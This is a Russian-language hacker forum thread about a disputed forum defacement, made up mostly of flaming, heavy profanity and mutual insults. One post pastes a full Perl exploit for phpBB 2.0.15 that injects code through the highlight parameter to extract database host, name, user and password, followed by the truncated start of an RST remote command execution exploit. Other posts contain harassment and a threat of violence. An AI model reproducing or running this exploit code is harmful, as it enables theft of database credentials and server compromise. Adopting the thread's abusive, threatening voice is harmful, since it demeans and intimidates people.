Дефейс

Статус
Закрыто для дальнейших ответов.
C темой про детей-инвалидов я вообще катался по-полу Это он наверное себя имел ввиду про детей-инвалидов - умственно-отсталый хаЦкер =))
Дете инвалит это ты!!!! Если ты себя хакером щитаешь то прими мой соболезнования.
Ты уверен что базы не было?
print "+-----------------------------------------------------------------------+\r\n"; print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n"; print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n"; print "+-----------------------------------------------------------------------+\r\n"; if (@ARGV < 3) { print "Usage:\r\n"; print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n"; print "SERVER - Server where PhpBB is installed.\r\n"; print "DIR - PHPBB directory or / for no directory.\r\n"; print "THREADID - Id of an existing thread.\r\n"; print "COOKIESTRING - Optional, cookie string of the http request.\r\n"; print " Use this when a thread needs authentication for viewing\r\n"; print " You can use Firefox in combination with \"Live HTTP\r\n"; print " Headers\" to get this cookiestring.\r\n\r\n"; print "Example 1 (with cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \" phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22 autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22 userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n"; print "Example 2 (without cookiestring):\r\n"; print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n"; exit(); } $serv = $ARGV[0]; $dir = $ARGV[1]; $threadid = $ARGV[2]; $cookie = $ARGV[3]; $serv =~ s/http:\/\///ge; $delimit = "GvRSecureD"; $sploit = $dir . "viewtopic.php?t="; $sploit .= $threadid; $sploit .= "&highlight='.printf($delimit."; $sploit .= "\$dbhost."; $sploit .= "$delimit."; $sploit .= "\$dbname."; $sploit .= "$delimit."; $sploit .= "\$dbuser."; $sploit .= "$delimit."; $sploit .= "\$dbpasswd."; $sploit .= "$delimit).'"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[ + ] Connecting ... Could not connect to host.\n\n"; print "[ + ] Connecting OK\n"; sleep(1); print "[ + ] Sending exploit "; print $sock "GET $sploit HTTP/1.1\r\n"; print $sock "Host: $serv\r\n"; if ( defined $cookie) { print $sock "Cookie: $cookie \r\n"; } print $sock "Connection: close\r\n\r\n"; $succes = 0; while ($answer = <$sock>) { $delimitIndex = index $answer, $delimit; if ($delimitIndex >= 0) { $succes = 1; $urlIndex = index $answer, "href"; if ($urlIndex < 0){ $answer = substr($answer, length($delimit)); $length = 0; while (length($answer) > 0) { $nex = index($answer, $delimit); if ($nex > 0) { push(@array, substr($answer, 0, $nex)); $answer = substr($answer, $nex + length($delimit), length($answer)); } else { $answer= ""; } } } } } close($sock); if ($succes == 1) { print "OK\n"; sleep(1); print "[ + ] Database Host: " . $array[0] . "\n"; sleep(1); print "[ + ] Database Name: " . $array[1] . "\n"; sleep(1); print "[ + ] Username: " . $array[2] . "\n"; sleep(1); print "[ + ] Password: " . $array[3] . "\n"; sleep(1); } else { print "FAILED\n"; }

#!/usr/bin/perl use IO::Socket; ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 4) { print q(############################################################ phpBB <=2.0.15 remote command execution exploit by RusH security team // www.rst.void.ru Littttttttttle modificated by nori! r57 respect! ############################################################ usage: r57phpbb2010.pl [DIR] [NUM] [CMD] params: [UR...ел в phpmychat? Могу доказать скажите как....

ЛООООООООООЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛ
РЖУ НИМАГУ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
И ты еще спрашиваешь верю ли я что базы не было?,нет я не верю,я знаю что ее не было!
Слышь К.е.Н иди учи азбуку абвгдей-ку,за%бал уже орфографические ошибки на каждом слове допускать :lol2:
Я бы вообще тебе статус оленя впаял,если бы был модером. :diablo:
Добавлено [time]1124093820[/time]
Уф-уф доказать,небось с секлаба стянул )))
Добавлено [time]1124094105[/time]
И вообще че за х*йню, RST-сплойты тут написал,зачем? хочешь показать какой ты крутой хакер :lol2:
Блин кен лучше перестань постить глупые мессаги пока я с пола на другой этаж от смеха не упал
Добавлено [time]1124094357[/time]
PhpBB 2.0.15 Database Authentication Details Exploit
Ты типа хотел сказать что ты сломал наш форум - vBulleten 3.0.7 сплойтом для phpBB ???
ЛООООООООООЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛ
РЖУ НИМАГУ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! :lol2: :lol2: :lol2: :lol2: :lol2: :lol2: :lol2: :lol2:
АФТАР УБЕЙ СЕБЯ И ВЫПИЙ ЙАДУ С ПУРГЕНОМ!
УГААГАГАГА ЛООООООООООЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛЛ
Добавлено [time]1124094912[/time]
Короче ладно, закройте топик нах,а то этот флейм будет продолжаться вечно.

К.е.Н - дебил,малолетка,ламак,######бол,долбоеб и т.п и этим все сказно.
Кстати скоро в новом анонисрованом мной релизом будут такие строчки в комментариях:
Fucking lamers: tristram,k.e.h
КЕН а ты знаменитость,бугагагагага :lol2:

vBulleten 3.0.7 сплойтом для phpBB ???
б** а какой адрес твоего сайта был? Че то я не врублюсь.
Почетатй секс лаб там такой уязвимости нет я в лички вам вышлю. Только просьба не кому не давать и не публиковать
Добавлено [time]1124100919[/time]
б** вы не люди и даже не звери !!!!!!!! Звери не издеваются над жертвой когда убивают ее.
Не плюй в разбитое лицо когда превосходство 3 против 1.

Вот лично моё мнение, K.e.H'a я не знаю, Nitкex'a тоже. Поэтом у лицо независимое и моё субъективное мнение следующее:

K.e.H Я бы на твоём месте послал давно всех и втречу реале забил, имхо тебя тут подвели под ######а, лоха, аленя и т.д., а ты всё им чё-то пытаешься доказать, чё как лох тупишь тут!

Nitrex, ты конечно бык, спору нет, если бы на меня так ######ли я б давно череп в хлам снёс и слова бы не сказал, но это ваше дело. Ты, Nitrex, больше языком трепишься, чем по делу говоришь, все твои оскробления, маты, ругательства... Всё это желание потсоянно унизить всех, кому-то чё-то доказать, вые*нуться, всё это по виду напоминает гонор пацана, который нормальным базаром вывезти ничё не может. Я не знаю сколько лет тебе или сколько лет кеху, но насколько я понимаю ты старше его и судя по твоим крикам, намного старше, а вот ведёшь ты себя как раз как школьник, был бы умнее и поступил бы как мужик: давно бы всё разложил по полочкам, сказал своё последнее слово и забыл эту тему или в крайнем случае выяснил бы всё лично.

2 BUG(O)R
чудо ты откуда взялось?
ты пошел на *** от ру24
если хошь попробовать поломать рога либо по таблу получить приезжай в приморье, поговорим.
тока для тебя дебила зарегался

2 К.е.Н
ты далбаеб?
тебе задали вопрос

2 К.е.Н ты далбаеб? тебе задали вопрос
Скорее ты долбоеб . Какой вопрос?.
Все я умываю руки... Хоти те верте а хотите нет... :swoon2:

Чюваки ёпта... всю дискуссию проебал... млиаааа..... хотя прикольно вышло..
поржал зато от души...

ЗЫ гыыгыгыыы... вношу свой вклад: ######БОЛ!

Ф###### короче... я больше сюда не ходок!

PS Кто хочет поговорить, например таких разговорчивых как Talos, стучите в аську: 827887.

Talos
Епт, не груби тому, кого не знаешь. Даже если знаешь - помалкивай.
BUG(O)R
Не уходи. Насри на придурков и оставайся =)
Но за Кена ты зря заступаешься... Если его посылают не на первом форуме, наверное, это не случайно ;)
Nitrex
А че тристрама в LMZ - списках значится. Поддерживаю nerezus-а, ему там вроде не место.
Talos
Ты как-то не вписался ;)

2 BUG(O)R
чудо ты откуда взялось?
ты пошел на *** от ру24
если хошь попробовать поломать рога либо по таблу получить приезжай в приморье, поговорим.
тока для тебя дебила зарегался
Реально зря, своими вы**онами ты ниче не добьешься, поверь.. Вот я например знаю о тебе тока что ты хостер Ру24 (или возможно скоро им станешь) и что тебя респектует Nitrex. Ну а если я кидаю респект Нуклеону, для тебя он станет значимым лицом, если ввяжется в разборку и начнет на всех гнать?
Реально, если ты не знаешь чела, нафига так посылать его, а? BUG(O)R уважаем в рунете.. И то что ты о нем не слышал не повод обсирать его.
К.е.Н
Мда, не ожидал... ты опустился в моих глазах.. а насчет баги - хз нашел ты ее сам или нет, если сам то опубликуй на секурлабе.. или античатовцам подкинь. А то как-то странно...

чудо ты откуда взялось?

Это будет правильнее спросить у тебя!!!!

ты пошел на *** от ру24

Никогда не говори за всех!!!

Обьясни мне причом тут ты?!!?

И вообще ты както не в тему тут!!

Что - то я вас совсем не понимаю, люди.
Nitrex, скажи мне, зачем употр**лять по отношению к К.е.Н - у "п.....л"?...
Ну сказал, он понял - разошлись и больше не встречаетесь. :huh:
Но в каждом посту писать это?...
А теперь называешь всех ламерами. Скажу честно - я ламер, можешь смело меня им называть. Смотря в чём, конечно - в дефейсах, сплойтах и прочем я - ламер.
Вот обьясни мне, зачем?
Просто по - человечески.

далеко же вы от конструктивной части..

Аффтар ЖЖот!
Пиши есчо!

:lol2: :lol2:
я уже смотрю скоро войну устроите.Я предлагаю убрать все нецензурные слова и выражения из выше написаного,вот тогда будет нормально читаться,а то в каждом посту по несколько матов,аж глаза слезятся только от одного вида :crazy:

Ps пора закрыть тему,куда админы пропали?

Статус
Закрыто для дальнейших ответов.
Верх